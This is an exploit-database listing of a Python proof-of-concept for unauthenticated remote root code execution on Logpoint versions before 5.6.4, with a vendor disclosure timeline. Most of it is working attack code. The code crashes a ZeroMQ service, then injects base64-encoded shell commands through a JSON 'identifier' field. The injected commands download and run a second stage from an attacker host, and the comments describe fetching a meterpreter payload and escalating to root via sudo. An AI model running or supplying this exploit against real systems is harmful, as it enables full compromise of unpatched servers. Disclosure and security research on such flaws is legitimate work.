Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution



EKU-ID: 6684 CVE: OSVDB-ID:
Author: agix Published: 2017-06-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
# Date: 11/06/17
# Exploit Author: agix
# Vendor Homepage: https://www.logpoint.com
# Version: logpoint < 5.6.4
# Tested on: 5.6.2
 
# Vendor contact 19/04
# Exploit details sent to the vendor 24/04
# Patch in test mode 05/05
# Patch release to public 08/05
 
 
# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
# to get root code execution this is the second stage e
# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
# it downloads a third stage executed as root
 
import time
import zmq
import sys
import json
import random
import string
import base64
 
ATTACKER_IP = '172.16.171.1'
LOGPOINT_IP = '172.16.171.204'
 
def crash():
    context = zmq.Context()
    sock = context.socket(zmq.DEALER)
    sock.connect("tcp://%s:5504"%LOGPOINT_IP)
    sock.send('crash')
 
crash()
time.sleep(1)
 
context = zmq.Context()
 
sock2 = context.socket(zmq.DEALER)
sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
 
name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
 
cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
cmd2 = base64.b64encode('cat /tmp/e')
 
exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
 
tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()
 
time.sleep(30)
 
# cleaning
tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
print tosend
sock2.send(tosend)
print sock2.recv()